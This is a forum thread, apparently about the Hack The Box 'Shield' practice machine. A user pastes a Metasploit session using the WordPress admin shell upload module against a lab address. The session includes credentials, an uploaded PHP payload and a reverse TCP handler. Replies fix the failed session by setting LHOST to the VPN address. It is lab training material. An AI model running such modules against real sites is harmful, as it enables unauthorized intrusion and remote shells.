Starting Point Shield

I can not get Metasploit to connect. Had it working yesterday but today spent hours trying different configurations to get access. doesnt seem to matter what I do, I get either “Exploit completed, but no session” or it tells me i must manualy delete the php files? Any one got any ideas?

msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
PASSWORD => P@s5w0rd!
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.10.10.29You can use Markdown in your post.
Tags
RHOSTS => 10.10.10.29
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[] Started reverse TCP handler on 10.10.14.47:4444
[
] Authenticating with WordPress using admin:P@s5w0rd!..
[+] Authenticated with WordPress
[] Preparing payload…
[
] Uploading payload…
[] Executing the payload at /wordpress/wp-content/plugins/BwHumiTWxa/rktORNWnDA.php…
[!] This exploit may require manual cleanup of ‘rktORNWnDA.php’ on the target
[!] This exploit may require manual cleanup of ‘BwHumiTWxa.php’ on the target
[!] This exploit may require manual cleanup of ‘…/BwHumiTWxa’ on the target
[
] Exploit completed, but no session was created.

Cheers

I was getting the same error, but updated the firewall rules and run msf as sudo and got the connection working. Hope this helps

open up your firewall.

Sorted chaps. Thank you.

@infotechcareer said:
open up your firewall.

Sorry, Noob here, how is this done? I have tried opening a port with ufw but that did not work. I am not sure what firewall I should be opening to run the metasploit exploit

Hi, im having he same problem here. I’m not sure how/what i need to open up the firewall with. ive tried installing ufw and running with ufw disable. can someone give me a pointer?

Rather than the firewall blocking traffic, I forgot to set my LHOST, which defaulted to the local VM address instead of the VPN address that the target can connect to.

Type your comment> @farmer2020 said:

Rather than the firewall blocking traffic, I forgot to set my LHOST, which defaulted to the local VM address instead of the VPN address that the target can connect to.

Thanks. It worked. I think the reverse shell in the target cant find your host ip so it lost. Set the LHOSTS so it can found you.